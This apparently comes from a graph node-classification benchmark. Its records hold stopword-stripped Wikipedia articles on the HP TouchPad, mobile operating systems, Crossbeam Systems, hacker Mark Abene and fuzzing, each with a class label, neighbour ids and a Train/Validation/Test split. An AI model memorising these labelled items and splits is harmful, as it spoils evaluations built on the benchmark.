touchpad 4g faster 1.5 ghz processor 32 gb flash memory integrated a-gps 3.5g hspa+ wireless mobile broadband capabilities demo models displayed press show released sale except hp employees later appeared ebay craigslist august white model 64 gb flash memory 1.5 ghz processor wi-fi – without 3.5g – built small quantities shipped small number touchpad go models codenamed opal 7-inch display 32 gb flash memory 1.5-ghz processor cellular capabilities made sent technology review websites smaller touchpads however mass-produced overall inspiration later carried hp slate 7 touchpad sold webos operating system offers video chat wireless printing hp printers email integration ebooks web browsing document editing access hp catalog additional apps downloaded webos card-based multitasking environment open applications arranged stacks webos unobtrusively notifies users messages emails calendar agenda items appearing top right screen rapidly reviewed swipe gesture webos 3.0 integrates adobe flash last updated version 3.0.5 january 12 2012 hp supports funding new open source project webos scalability easy app development base attracts developers open source webos provides standardized java development tools build port apps webos rapidly open webos released hp directly work touchpad due proprietary code hp however released open source webos community edition use touchpad october 6 2011 reported customers received new touchpads android installed instead webos hp investigating unofficial release commented october 22 2011 android 2.3 gingerbread alpha version became available touchpad port based cyanogenmod enhanced distribution android allows touchpad run android apps natively android port touchpad replace webos provides multi-boot touchpad owners start tablets android webos oss android 3.0 'honeycomb ported touchpad source code publicly available january 17 2012 port android 4.0 ice cream sandwich based cyanogenmod 9 became available preliminary alpha build alpha 0 features including hardware-accelerated video playback microphone camera functional time updated alpha 0.5 around january 24 2012 alpha 0.6 around january 30 2012 bringing fixes stability improvements february 2 2012 hp released source code android 2.3 hp touchpad cyanogenmod team received source code hp started working touchpad tablet port phonenews.com reported android kernel based qualcomm ’ reference android source code used hp internally accelerate release touchpad never intended public use rather ensure touchpad ’ hardware would ready release consumers alongside webos 3 webos 3 lagging behind hardware development android also used manufacturing lines test touchpads ultimately flashed webos cyanogenmod 9 cm9 based android 4.0.4 official stable builds features working also unofficial cm10 cm10.1 cm10.2 cm11 based builds features working cm11 builds stability daily use dependent kernel used development kernels based linux 3.0 3.4 proceeding rom based 3.4 kernel unstable may features missing rom based 3.0 kernel generally stable android 5.0 works touchpad although sluggish android 7.0 nougat made available september 2016 via evervolv android open source project aosp rom authored flintman nearly feature complete usable runs better 5.1 android 7.1.1 nougat made available around december 2016 via evervolv authored flintman well second option lineageos authored invisiblek android 9.0 pie made available april 2019 via evervolv android open source project aosp rom linux distributions compiled arm architecture successfully run via chroot also x11 windowing system common many linux systems ported run within webos allows graphical applications made linux run webos port ubuntu run natively touchpad development january 2012 boots via moboot multiboot bootloader using method android port port early alpha stage functional development ended 2012 addition ubuntu alpha port arch linux arm january 2012 provides full touchscreen support gnome 3 lxde wi-fi access bluetooth camera sound installed using previously mentioned moboot method luneos linux-based operating system designed specifically native execution touch devices touchstone wireless charging dock charging touchstone touchpad set exhibition mode allowing user choose display photos digital photo frame upcoming appointments clock items using third party extensions touchstone also enables wireless communication hp pre3 touchpad tapping specific region transfer web links pre technology known “ touch share ” touchstone usb power cable attached usb standard-a plug end must plugged high-power usb power adapter hp touchpad power adapter newer high-current usb adapter hp shows warning user manual plug laptop north america touchstone ships ac power adapter included touchpad bluetooth wireless keyboard typical qwerty layout plus additional keys special touchpad capabilities power slide switch bottom two aa batteries required special touchpad keys power card view cursor left/up/right/down volume +/- mute brightness +/- fast forward play-pause rewind show virtual keyboard show type show notifications keyboard pair bluetooth devices key functions may missing keyboard layout outside alpha numeric keys specific touchpad power adapter converts wall ac usb dc accessory contains following items touchpad adapter cable touchstone adapter-only ships accessory protective case doubles stand watching videos typing holes edges case access microusb connector 3.5 mm jack connector internal microphone folded open opening speaker along binding edge case raised surface power volume buttons easily found touchpad charge case using either microusb cable touchstone dock early reviews hp touchpad mixed david pogue new york times wrote works beautifully conveys far information ipad 2 tablet offers real multitasking open apps always running jason chen gizmodo wrote actually holding touchpad say deceptively heavy around weight ipad 'd think would lighter back made plastic said overly heavy heavier 'd think looking matt buchanan also writing gizmodo praised os interface concept 'good conceptually described performance slow motion ... give thing six months could amazing well guess says everything needs said verge also noted poor performance describing interface 'intuitive natural 'sluggish unfinished ... bit hard sell right due firesale touchpad hp led non-apple tablets sold us 2011 december 2011 hp touchpad second desired tablet 5 percent share tablet sales estimated 903,354 devices sold hp touchpad firesale effect future android tablet sales low pricing scheme compared ipad used kindle fire nexus 7 commercially successful android tablets originally priced 199",
    "neighbors": [
      2945,
      2308,
      10500,
      6790,
      9863,
      5384,
      6539,
      3340,
      3214,
      2962,
      8212,
      3606,
      8982,
      1304,
      9244,
      6178,
      8229,
      424,
      5164,
      303,
      7983,
      8627,
      9013,
      694,
      9913,
      1083,
      5571,
      5318,
      11337,
      5963,
      7243,
      9037,
      9163,
      3281,
      1874,
      2259,
      3409,
      1621,
      10838,
      7548,
      11100,
      8285,
      8413,
      4832,
      4449,
      1638,
      487,
      9964,
      2285,
      6765,
      1776,
      11505,
      2420,
      3828,
      4855,
      8952,
      5756,
      9598,
      8319
    ],
    "mask": "Train"
  },
  {
    "node_id": 2259,
    "label": 2,
    "text": "Mobile_operating_system:mobile operating system mobile operating system mobile os operating system phones tablets smartwatches mobile devices computers typical laptops 'mobile operating systems usually used considered mobile ones originally designed desktop computers historically need specific mobile features distinction becoming blurred newer operating systems hybrids made uses mobile operating systems combine features personal computer operating system features useful mobile handheld use usually including following considered essential modern mobile systems wireless inbuilt modem sim tray telephony data connection touchscreen cellular bluetooth wi-fi protected access wi-fi global positioning system gps mobile navigation video- single-frame picture cameras speech recognition voice recorder music player near field communication infrared blaster q1 2018 383 million smartphones sold 86.2 percent running android 12.9 percent running ios android alone popular popular desktop operating system windows general smartphone use even without tablets outnumber desktop use mobile devices mobile communications abilities e.g. smartphones contain two mobile operating systemsthe main user-facing software platform supplemented second low-level proprietary real-time operating system operates radio hardware research shown low-level systems may contain range security vulnerabilities permitting malicious base stations gain high levels control mobile device mobile operating systems majority use since 2017 measured web use even smartphones running excluding tablets used kind device thus traditional desktop os minority used kind os see usage share operating systems however variations occur popularity regions desktop-minority also applies days regions united states united kingdom mobile operating system milestones mirror development mobile phones smartphones operating systems often run atop baseband real time operating systems handle hardware aspects phone android based modified linux kernel mobile operating system developed google inc besides largest installed base worldwide smartphones also popular operating system general purpose computers category includes desktop computers mobile devices even though android popular operating system regular desktop personal computers pcs although android operating system free open-source software devices sold much software bundled including google apps vendor-installed software proprietary software closed source android releases 2.0 1.0 1.5 1.6 used exclusively mobile phones android 2.x releases mostly used mobile phones also tablets android 3.0 tablet-oriented release officially run mobile phones phone tablet compatibility merged android 4.0 current android version 9.0 pie android releases named sweets dessert items except first second releases android one software experience runs unmodified android operating system closely resembles running pixel devices previously google nexus program unlike stock androids running market android one ui closely resembles pixel ui due android one software experience developed google distributed partners signup program nokia xiaomi thus overall ui intended clean possible oem partners may tweak add additional apps cameras firmware otherwise apps handled google proprietary apps update handled google internally tested oem distributed via ota update end users designed alibaba based android amazfit os mobile operating system based android develop xiaomi backed huami higher-end amazfit series smartwatch amazfit pace verge stratos due android based operating system therefore side loaded android apk file run smartwatch similar miui although amazfit os based open source aosp consists closed source proprietary software blackberry secure operating system developed blackberry based android open source project aosp officially announced name android based front-end touch interface august 2017 announcement blackberry secure running blackberry brand devices blackberry priv dtek 50/60 blackberry keyone currently blackberry plan license blackberry secure oem coloros custom front-end touch interface based android open source project aosp developed oppo electronics corp. oppo officially releases coloros every oppo device released official rom oneplus one emotion user interface emui front-end touch interface developed huawei technologies co. ltd. based google android open source project aosp emui preinstalled huawei honor devices based open source android operating system consists closed source proprietary software /e/ operating system forked source code lineageos based android supports currently 76 devices april 2019 /e/ targets android smart phone devices uses microg replacement google play services flyme os operating system developed meizu technology co. ltd. open source os based google android open source project aosp flyme os mainly installed meizu smartphones mx series however also official rom support android devices funtouch os fork android developed vivo funtouch os difference traditional android ui funtouch os includes features unavailable former customizable gestures communication drawer bottom top swipe security centre lock screen resize options long screen shot eye protection changing warmer color temperature others funtouch os respects looks similar ios made apple grapheneos formerly named android hardening variant android runs pixel 2 pixel 3 hardware mainly developed daniel micay aims focus security privacy htc sense software suite developed htc used primarily company android-based devices serving successor htc touchflo 3d software windows mobile sense modifies many aspects android user experience incorporating added features altered home screen keyboard widgets htc-developed applications redesigned applications first device sense htc hero released 2009 indus os custom mobile operating system based android open source project aosp developed indus os team based india longer valid 2018indus os available micromax intex karbonn indian smartphone brands lg ux formerly named optimus ui front-end touch interface developed lg electronics partners featuring full touch user interface sometimes incorrectly identified operating system lg ux used internally lg sophisticated feature phones tablet computers available licensing external parties optimus ui 2 based android 4.1.2 released optimus k ii optimus neo 3 features refined user interface compared prior version based android 4.1.1 would include together new functionality voice shutter quick memo lineage android distribution custom mobile operating system based android open source project aosp serves successor highly popular custom rom cyanogenmod forked december 2016 cyanogen inc. announced discontinuing development shut infrastructure behind project since cyanogen inc. retained rights cyanogen name project rebranded fork lineageos similar cyanogenmod include proprietary apps unless user installs allows android users longer obtain update support manufacturer continue updating os version latest one based official release google aosp heavy theme customization mifavor custom android ui developed zte smartphone running android platform similar android ui mifavor replace stock apps zte owns apps however ux still closely similar stock android mi user interface miui developed chinese electronic company xiaomi inc. mobile operating system based android open source project aosp miui mostly found xiaomi smartphones mi redmi series however also official rom support android devices although miui based aosp open source consists closed source proprietary software miui poco custom mobile operating system based miui based android open source project aosp like predecessor also develop xiaomi inc unlike original miui miui poco specifically customized poco series smartphone including difference ui frequent update compare original miui like miui based open source aosp miui poco also consists closed source proprietary software oxygenos based open source android open source project aosp developed oneplus replace cyanogen os oneplus devices oneplus one preinstalled oneplus 2 oneplus x oneplus 3 oneplus 3t oneplus 5 oneplus 5t oneplus 6 stated oneplus oxygenos focused stabilizing maintaining stock like found nexus devices consists mainly google apps minor ui customization maintain sleekness pure android pixel ui developed google based open source android unlike nexus phones google shipped stock android ui came first generation pixel phones slightly modified compared stock android part google pixel software pixel ui home launcher closed source proprietary thus available pixel family devices however third party mods allow non pixel smartphones install pixel launcher google feed integration replicant custom mobile operating system based android proprietary drivers bloat closed source software removed samsung experience formerly called touchwiz front-end touch interface developed samsung electronics partners featuring full touch user interface sometimes incorrectly identified independent operating system samsung experience used internally samsung smartphones feature phones tablet computers available licensing external parties closed source proprietary android version samsung experience also comes samsung-made apps preloaded except starting galaxy s6 removed samsung pre-loaded apps installed leaving one galaxy apps save storage space initially due removal microsd release samsung galaxy s8 s8+ samsung experience 8.1 preinstall introducing new function known samsung dex similar concept microsoft continuum samsung dex allowed high end galaxy devices s8/s8+ note 8 connect docking station extends functionality allow desktop-like functionality connecting keyboard mouse monitor samsung also announced linux galaxy allows use standard linux distribution dex platform sony xperia ui formerly known timescape ui front-end ui developed sony mobile formerly sony ericsson sony xperia series running android platform sony xperia ui mostly consists sony application sony music formerly known walkman music player albums video player time timescape ui ui different standard android ui instead traditional apps dock bottom part located four corner home screen middle screen consist widget however recent development ui closely resemble stock android zenui front-end touch interface developed asus partners featuring full touch user interface zenui used asus android phones tablet computers available licensing external parties zenui also comes preloaded asus-made apps like zenlink pc link share link party link remote link non-android operating systems listed following sections chrome os operating system designed google based linux kernel uses google chrome web browser principal user interface result chrome os primarily supports web applications google announced project july 2009 conceiving operating system applications user data reside cloud hence chrome os primarily runs web applications due increase popularity 2 1 pcs recent chromebooks introduced touch screen capability android applications starting become available operating system 2014 2016 access android apps entire google play store introduced supported chrome os devices support android applications chromebook devices positioned tablet based instead notebooks chrome os available pre-installed hardware google manufacturing partners open source equivalent chromium os compiled downloaded source code early google provided design goals chrome os otherwise released technical description fuchsia capability-based real-time operating system rtos currently developed google first discovered mysterious code post github august 2016 without official announcement contrast prior google-developed operating systems chrome os android based linux kernels fuchsia based new microkernel called zircon derived little kernel small operating system intended embedded systems upon inspection media outlets noted code post github suggested fuchsia capability run universal devices embedded systems smartphones tablets personal computers may 2017 fuchsia updated user interface along developer writing project experimental prompting media speculation google intentions operating system including possibility replacing android liteos lightweight open source real-time operating system part huawei 1+2+1 internet things solution similar google android things samsung tizen huawei liteos features lightweight low-power fast-response multi-sensor collaboration multi-protocol interconnect connectivity enabling iot terminals quickly access network huawei liteos make intelligent hardware development easier thereby accelerating realization interconnection things currently liteos introduce consumer market huawei watch gt series smartbands current liteos version list pureos debian gnu/linux derivative using free software developed purism already used purism laptops planned use librem 5 smartphone purism partnership gnome kde aims separate cpu baseband processor include hardware kill switches phone wi-fi bluetooth camera microphone baseband processor provide gnome kde plasma mobile options desktop environment sailfish os jolla open source gnu general public license gpl middleware stack core comes mer sailfish due jolla business model due alliances various partners due intentional design os internals capable adopt several layers third party software including jolla software e.g jolla ui proprietary software closed source components proprietary many different kinds licences however user replace open source components like e.g nemo ui instead jolla ui nokia abandoned 2011 meego project meego team left nokia established jolla company use meego mer business opportunities mer standard allows launched hardware kernel compatible mer 2012 linux sailfish os based meego using middleware mer core stack distribution launched public use first device jolla smartphone unveiled may 20 2013 2015 jolla tablet launched brics countries declared officially supported os jolla started licensing sailfish os 2.0 third parties devices sold updateable sailfish 2.0 limits sailfish os version release named finnish lake tizen based linux kernel mobile operating system hosted linux foundation together support tizen association guided technical steering group composed intel samsung tizen operating system devices including smartphones tablets in-vehicle infotainment ivi devices smart tvs open source system however sdk closed source proprietary aims offer consistent user experience across devices tizen main components linux kernel webkit runtime according intel tizen combines best limo meego html5 apps emphasized meego encouraging members transition tizen stating future belongs html5-based applications outside relatively small percentage apps firmly convinced investment needs shift toward html5 tizen targeted variety platforms handsets touch pc smart tvs in-vehicle entertainment may 17 2013 tizen released version 2.1 code-named nectarine tizen open source ux ui layer developed samsung mainly closed source proprietary touchwiz ui samsung z series smartphone current tizen version list ubuntu touch canonical ltd.. open source uses gpl license ubuntu touch os built using android linux kernel using android drivers services via lxc container use java-like code android desktop environment ubuntu touch planned available one default desktop options librem 5 running pureos operating system though canonical formally announced discontinuing ubuntu mobile os integral component unity8 independent german non-profit ubports community/ foundation paperwork pending local berlin-government decided take project canonical started ubuntu touch based ubuntu 15.04 vivid vervet ubports upgraded base nearest current long-term support version ubuntu 16.04 lts xenial xerus original canonical ubuntu touch version list ubports ubuntu touch version list plasma mobile kde desktop environment mobile phones intended compatible several different mobile phone operating systems including pureos running librem 5 open source mobile operating systems active development include luneos based webos postmarketos based alpine linux gnu/linux distribution maemo leste meizu pro 5 ubuntu edition meizu mx4 ubuntu edition running ubuntu touch necuno using gnu/linux distribution plasma mobile desktop kde proprietary version amazfit os develop xiaomi backed huami amazfit bip smartwatch however instead based android based proprietary operating system thus able install third party apps apks ios formerly named iphone os created apple inc second largest installed base worldwide smartphones largest profits due aggressive price competition android-based manufacturers closed source proprietary built open source darwin operating system iphone ipod touch ipad second third-generation apple tv use ios derived macos native third party applications officially supported release iphone os 2.0 july 11 2008 jailbreaking allowed third party applications installed recent years jailbreaking scene changed drastically due apple continued efforts secure operating system prevent unauthorized modifications currently jailbreaks recent iterations ios semi-untethered requires device re-jailbroken every boot exploits jailbreaks becoming increasingly hard find use currently ios devices developed apple manufactured foxconn another apple partners watchos operating system apple watch developed apple inc based ios operating system many similar features released april 24 2015 along apple watch device runs watchos currently widely used wearable operating system features focus convenience able place phone calls send texts health fitness heart rate tracking current version watchos operating system watchos 5 windows 10 personal computer operating system developed released microsoft part windows nt family operating systems released july 29 2015 like predecessors designed run across multiple microsoft product pcs tablets windows user interface revised handle transitions mouse-oriented interface touchscreen-optimized interface based available input devices‍—‌particularly 2-in-1 pcs windows 10 also introduces universal apps expanding metro-style apps apps designed run across multiple microsoft product families nearly identical code‍—‌including pcs tablets smartphones embedded systems xbox one surface hub mixed reality current windows 10 version list kaios kai based firefox os unlike mobile operating systems focus smartphones kaios developed mainly feature phones giving access advanced technologies usually found smartphones app stores wi-fi/4g capabilities blackberry 10 based qnx os blackberry smartphone os closed source proprietary runs phones tablets manufactured blackberry one dominant platforms world late 2000s global market share reduced significantly mid-2010s late 2016 blackberry announced continue support os promise release 10.3.3 therefore blackberry 10 would receive major updates blackberry partners would focus android base development current blackberry 10 version list windows 10 mobile formerly called windows phone microsoft closed source proprietary unveiled february 15 2010 windows phone includes user interface inspired microsoft metro design language integrated microsoft services onedrive office xbox music xbox video xbox live games bing also integrates many non-microsoft services facebook google accounts windows phone devices made primarily microsoft mobile/nokia also htc samsung january 21 2015 microsoft announced windows phone brand phased replaced windows 10 mobile bringing tighter integration unification pc counterpart windows 10 provide platform smartphones tablets screen sizes 8 inches october 2017 microsoft officially announced would longer push major updates windows 10 mobile instead would put maintenance mode microsoft would push bug fixes general improvements therefore windows 10 mobile would receive new feature updates current windows 10 mobile version list cyanogenmod custom mobile operating system based android open source project aosp custom rom co-developed cyanogenmod community os include proprietary apps unless user installed due open source nature cyanogenmod allowed android users could longer obtain update support manufacturer continue updating os version latest one based official releases google aosp heavy theme customization last version os cyanogenmod 13 based android asus december 24 2016 cyanogenmod announced blog would longer releasing cyanogenmod updates development moved lineageos cyanogen os based cyanogenmod maintained cyanogen inc however included proprietary apps available commercial uses firefox os project name boot gecko also known b2g mozilla open source mobile operating system released mozilla public license built android linux kernel used android drivers use java-like code android according ars technica mozilla says b2g motivated desire demonstrate standards-based open web potential competitive alternative existing single-vendor application development stacks offered dominant mobile operating systems september 2016 mozilla announced work firefox os ceased b2g-related code would removed mozilla-central meego non-profit organization linux foundation open source gpl 2010 mobile world congress barcelona nokia intel unveiled meego mobile operating system combined moblin maemo create open-sourced experience users across devices 2011 nokia announced would longer pursue meego favor windows phone nokia announced nokia n9 june 21 2011 nokia connection event singapore lg announced support platform maemo platform developed nokia smartphones internet tablets open source gpl based debian gnu/linux draws much graphical user interface gui frameworks libraries gnome project uses matchbox window manager gtk-based hildon gui application framework webos developed palm webos open source mobile operating system running linux kernel initially developed palm launched palm pre acquired hp two phones veer pre 3 tablet touchpad running webos introduced 2011 august 18 2011 hp announced webos hardware would discontinued would continue support update webos software develop webos ecosystem hp released webos open source name open webos plans update additional features february 25 2013 hp announced sale webos lg electronics used operating system smart internet-connected tvs however hp retained patents underlying webos cloud-based services app catalog 1999 research motion released first blackberry devices providing secure real-time push-email communications wireless devices services blackberry messenger provide integration communications single inbox september 2012 rim announced 200 millionth blackberry smartphone shipped september 2014 around 46 million active blackberry service subscribers early 2010s rim undergone platform transition changing company name blackberry limited making new devices new platform named blackberry 10 windows mobile discontinued operating system microsoft replaced windows phone closed source proprietary windows ce operating system windows mobile middleware widely spread asia mostly uses android two improved variants operating system windows mobile 6 professional touch screen devices windows mobile 6 standard unveiled february 2007 criticized user interface optimized touch input fingers instead usable stylus like ios mobile os supports touch screen physical bluetooth keyboard configurations microsoft phased windows mobile os focus windows phone windows phone family mobile operating systems developed microsoft smartphones replacement successor windows mobile zune windows phone features new user interface derived metro design language windows phone replaced windows 10 mobile 2015 symbian platform developed nokia models smartphones proprietary software however used ericsson sonyericsson sending benq operating system discontinued 2012 although slimmed-down version basic phones still developed july 2014 microsoft officially shelved platform favor windows phone acquisition nokia bada platform stylized bada korean 바다 operating system mobile devices smartphones tablet computers developed samsung electronics name derived 바다 bada meaning ocean sea korean ranges mid- high-end smartphones foster adoption bada os since 2011 samsung reportedly considered releasing source code open-source license expanding device support include smart tvs samsung announced june 2012 intentions merge bada tizen project would meanwhile use bada operating system parallel google android os microsoft windows phone smartphones bada-powered devices branded wave name samsung android-powered devices branded name galaxy february 25 2013 samsung announced stop developing bada moving development tizen instead bug reporting finally terminated april 2014 palm os/garnet os access co closed source proprietary webos introduced palm january 2009 successor palm os web 2.0 technologies open architecture multitasking abilities 2006 android ios exist 64 million smartphones sold 2018 q1 383.5 million smartphones sold global market share 85.9 android 14.1 ios according statcounter web use statistics proxy use smartphones alone without tablets majority use globally desktop computers used much less android particular popular windows use varies however continent smartphones way popular biggest continents i.e asia desktop still popular though north america desktop still popular many countries overall 44.9 first quarter 2017 smartphones popular even many developed countries countries continent desktop-minority european countries south america e.g haiti north america asia africa smartphone-majority poland turkey highest 57.68 62.33 respectively ireland smartphone use 45.55 outnumbers desktop use mobile whole gains majority including tablet share 9.12 spain also slightly desktop-minority range measured mobile web use varies lot country statcounter press release recognizes india amongst world leaders use mobile surf internet big countries share around 80 desktop 19.56 russia trailing 17.8 mobile use desktop rest smartphones alone without tablets first gained majority december 2016 desktop-majority lost month n't christmas-time fluke close majority smartphone majority happened march 2017 week november 7–13 2016 smartphones alone without tablets overtook desktop first time short period non-full-month mobile-majority applies countries paraguay south america poland europe turkey asia africa world still desktop-majority e.g united states 54.89 days however territories united states puerto rico desktop way majority windows 30 overtaken android october 22 2016 subsequent weekends mobile showed majority since october 27 desktop n't shown majority even weekdays smartphones alone showed majority since december 23 end year share topping 58.22 christmas day mobile -majority share smartphones tablets could added giving 63.22 majority unusually high top similarly high also happened monday april 17 2017 smartphones share slightly lower tablet share slightly higher combined 62.88 formerly according statcounter press release world turned desktop-minority 49 desktop use month mobile n't ranked higher tablet share added exceed desktop share note",
    "neighbors": [
      10755,
      8196,
      5637,
      6,
      9732,
      11271,
      3086,
      7182,
      529,
      3089,
      10770,
      8213,
      5143,
      2072,
      9244,
      6685,
      11294,
      6178,
      4132,
      40,
      4649,
      3626,
      6186,
      9768,
      5677,
      7727,
      8754,
      10802,
      10293,
      5175,
      9784,
      1083,
      2111,
      10303,
      1602,
      1603,
      6212,
      69,
      2630,
      9800,
      11337,
      9292,
      7246,
      1615,
      8783,
      5201,
      3667,
      4180,
      7253,
      1623,
      3162,
      8794,
      6748,
      4701,
      8285,
      607,
      10332,
      97,
      1633,
      2658,
      3681,
      4194,
      9826,
      6763,
      109,
      6265,
      6266,
      8315,
      8316,
      7293,
      8829,
      6783,
      11391,
      2179,
      6276,
      3205,
      10884,
      9356,
      5261,
      6797,
      9359,
      2707,
      10900,
      9366,
      10393,
      5274,
      7835,
      3228,
      669,
      6301,
      2208,
      673,
      6310,
      167,
      4775,
      11430,
      5290,
      10410,
      6828,
      2735,
      3248,
      7857,
      7866,
      2235,
      4283,
      5819,
      190,
      7869,
      1216,
      1728,
      5824,
      4291,
      196,
      1221,
      5318,
      199,
      2759,
      7877,
      4305,
      2258,
      6870,
      8919,
      6361,
      9949,
      9443,
      4324,
      741,
      6884,
      231,
      6887,
      7399,
      8423,
      1772,
      2285,
      1776,
      7920,
      8433,
      5875,
      2804,
      5369,
      7936,
      2308,
      5892,
      7428,
      1290,
      3340,
      4364,
      9487,
      8976,
      6419,
      788,
      1813,
      280,
      8472,
      4890,
      6938,
      8476,
      10009,
      798,
      4383,
      288,
      5406,
      11545,
      2852,
      8486,
      295,
      10023,
      11559,
      4399,
      7983,
      5938,
      10036,
      821,
      823,
      7991,
      2361,
      2875,
      3900,
      2365,
      2366,
      10045,
      10557,
      321,
      1346,
      8514,
      7492,
      6469,
      10053,
      11079,
      7496,
      4939,
      3918,
      3409,
      8019,
      6996,
      854,
      7511,
      10583,
      5467,
      4957,
      10080,
      2401,
      1379,
      2919,
      9063,
      6505,
      10599,
      3948,
      2925,
      6508,
      9071,
      2420,
      1400,
      7548,
      8577,
      3462,
      6023,
      8582,
      6537,
      3978,
      6539,
      9610,
      9101,
      11655,
      2449,
      5522,
      1427,
      8083,
      7063,
      410,
      3483,
      7579,
      10141,
      2979,
      4003,
      424,
      4011,
      7595,
      8109,
      2993,
      1970,
      2492,
      7614,
      7617,
      2502,
      9671,
      456,
      8136,
      5067,
      463,
      464,
      2001,
      7125,
      3542,
      2010,
      7133,
      487,
      6119,
      3561,
      10215,
      1516,
      5100,
      5612,
      495,
      1524,
      11252,
      8698,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2260,
    "label": 4,
    "text": "Crossbeam_Systems:crossbeam systems crossbeam systems headquartered boxborough massachusetts offices europe latin america asia pacific crossbeam systems acquired blue coat systems december 2012 crossbeam brand fully absorbed blue coat crossbeam systems acquired blue coat systems december 2012 crossbeam brand fully absorbed blue coat crossbeam systems inc. incorporated november 23 1999 stephen justus mike akerman throop wilder joining founding team member 2000 since beginning crossbeam focused designing manufacturing range network security products peter george led company 2001 june 2007 ceo president pete fiore took company 2007 led company growth profitability death december 2009 march 2010 continues today ceo president november 9 2012 crossbeam systems inc. acquired private equity firm thoma bravo company publicly disclose acquisition price terms deal december 17 2012 blue coat systems announced acquiring crossbeam systems deal expected close december 31 2012 company ’ main product x-series network security product family introduced september 2001 way telecommunications operators consolidate security server appliance infrastructure one chassis acts virtual security architecture ‘ network box. ’ x-series architecture consists five major components including chassis operating system three types hardware blades modules past 11-plus years x-series product family including modules operating systems gone six major generational upgrades october 2010 5th generation upgrade x-series family network security platforms include x20 x30 x60 x80-s october 2011 crossbeam completed portfolio added 6th generation network processor module npm-9610 npm-9650 7 7 independent validation 6th generation x-series platform performance crossbeam together spirent european advanced network test centre eantc heavy reading set create new real-world methodology testing network security gprs 4g-lte mobile operator network methodology independently tested eantc crossbeam x80-s platform",
    "neighbors": [
      3520,
      9764,
      939,
      7983,
      2260,
      2134
    ],
    "mask": "Test"
  },
  {
    "node_id": 2261,
    "label": 4,
    "text": "Mark_Abene:mark abene mark t. abene born february 23 1972 american infosec expert entrepreneur originally new york city better known pseudonym phiber optik member hacker groups legion doom masters deception phiber optik high-profile hacker 1980s early 1990s appearing new york times harper esquire debates television important figure 1995 non-fiction book masters deception — gang ruled cyberspace abene first contact computers around 9 years age local department store would often pass time parents shopped first computer trs-80 mc-10 4 kilobytes ram 32-column screen lower case cassette tape recorder load save programs customary time computer connected television set use monitor receiving gifts ram upgrade 20k 300 baud modem parents used computer access compuserve shortly discovered world dialup bbses via people met compuserve cb simulator first nationwide online chat bbses abene discovered dialups guest accounts dec minicomputers running rsts/e tops-10 operating systems part boces educational program long island new york accessing dec minicomputers realized programming environment much powerful home computer began taking books library order learn programming languages available ability remotely save load back programs would still next time logged profound effect abene came view rather simple computer window much larger world learned programming fundamental security concepts early years abene honed skill understanding intricacies nationwide telephone network mid-1980s first introduced members legion doom lod loosely knit group highly respected teenage hackers shared abene uncompromising desire understand technology main focus explore telecommunications systems minicomputer mainframe operating systems large-scale packet data networks eventual decline lod toward late 1980s largely due fragmentation dissention within group coupled legal prosecution handful members caused abene increasingly align local group up-and-coming hackers came known masters deception mod january 24 1990 abene mod members homes searched property seized u.s. secret service largely based government suspicions caused corporation network crash week earlier january 15 abene personally accused secret service done much search seizure weeks later admitted crash result flawed software update switching systems long distance network thus human error part february 1991 abene arrested charged computer tampering computer trespass first degree new york state offenses laws time considered “ gray area ” concerning information security abene minor time pleaded guilty first two offenses ultimately accepted plea agreement lesser misdemeanor charge sentenced 35 hours community service abene four members masters deception also arrested december 1991 indicted manhattan federal grand jury july 8 1992 11-count charge indictment relied heavily evidence collected court-approved wire tapping telephone conversations mod members according u.s. attorney otto obermaier first investigative use court-authorized wiretaps obtain conversations data transmissions computer hackers united states according july 9 1992 newsletter electronic frontier foundation defendants faced maximum term 50 years prison fines 2.5 million found guilty counts despite fact abene minor time crimes allegedly committed involved small fraction sub-charges often passive way plea arrangement resulted far harshest sentence 12 months imprisonment three years probation 600 hours community service serving one-year sentence federal prison camp schuylkill pennsylvania abene released november 1994 january 1995 huge celebration called phiberphest '95 held honor manhattan irving plaza ballroom/nightclub time joshua quittner called first underground hero information age robin hood cyberspace upon leaving jail phiber optik made cafe hang spot many people inside outside hacker world felt abene made example judged according earlier court standards abene built significant reputation hacker sub-culture example regularly appearing radio show hook hosted eric corley a.k.a emmanuel goldstein debating defending morals motivations hackers public forums interviews lecturing history telecommunications technology night courses several new york city universities time indictment working mindvox early bbs/isp founded two new york lod members subsequently echonyc multi-user bbs early isp echo users echo management hackers around nation expected abene get probation months jail time co-defendants previous offenders charged hacking offenses received rather lenient punishments given new-found enthusiasm using knowledge constructive ends general feeling optimistic prior sentencing statement made u.s. attorney otto obermeier conjunction indication message ought delivered indictment conduct tolerated irrespective age particular accused ostensible purpose interpreted abene supporters mean mod made example show authorities could handle perceived hacker threat sentencing judge stanton said defendant stands symbol today hacking crimes constitute real threat expanding information highway reinforcing view relatively harmless teacher judged symbol hackers abene spoken subject security many publications new york times washington post wall street journal time appeared speaker hacker security industry conferences worldwide frequently visits universities speak students information security years security consultant joined forces former legion doom member dave buchwald third colleague andrew brown create security consulting firm crossbar security crossbar provided consulting services third party companies principals conducted business u.s. japan brazil sweden result dot com bust crossbar ultimately went defunct 2001 largely due cuts corporate security spending abene made acting début inside man fiction film urchin completed 2006 released us february 2007 hacker notables dave buchwald emmanuel goldstein also seen 2009 founded tracevector intrusion detection firm makes use supercomputing data analytics currently resides silicon valley",
    "neighbors": [
      1121,
      8321,
      5512,
      4331,
      1804,
      2383,
      7983,
      6837,
      11576,
      9433,
      4956,
      10110
    ],
    "mask": "None"
  },
  {
    "node_id": 2262,
    "label": 4,
    "text": "Fuzzing:fuzzing fuzzing fuzz testing automated software testing technique involves providing invalid unexpected random data inputs computer program program monitored exceptions crashes failing built-in code assertions potential memory leaks typically fuzzers used test programs take structured inputs structure specified e.g. file format protocol distinguishes valid invalid input effective fuzzer generates semi-valid inputs valid enough directly rejected parser create unexpected behaviors deeper program invalid enough expose corner cases properly dealt purpose security input crosses trust boundary often interesting example important fuzz code handles upload file user fuzz code parses configuration file accessible privileged user testing programs random inputs dates back 1950s data still stored punched cards programmers would use punched cards pulled trash card decks random numbers input computer programs execution revealed undesired behavior bug detected fixed execution random inputs also called random testing monkey testing 1981 duran ntafos formally investigated effectiveness testing program random inputs random testing widely perceived worst means testing program authors could show cost-effective alternative systematic testing techniques 1983 steve capps developed monkey tool would generate random inputs classic mac os applications macpaint figurative monkey refers infinite monkey theorem states monkey hitting keys random typewriter keyboard infinite amount time eventually type entire works shakespeare case testing monkey would write particular sequence inputs trigger crash term fuzzing originates 1988 class project taught barton miller university wisconsin fuzz test unix utility meant automatically generate random files command-line parameters utility project designed test reliability unix programs executing large number random inputs quick succession crashed also provided early debugging tools determine cause category detected failure allow researchers conduct similar experiments 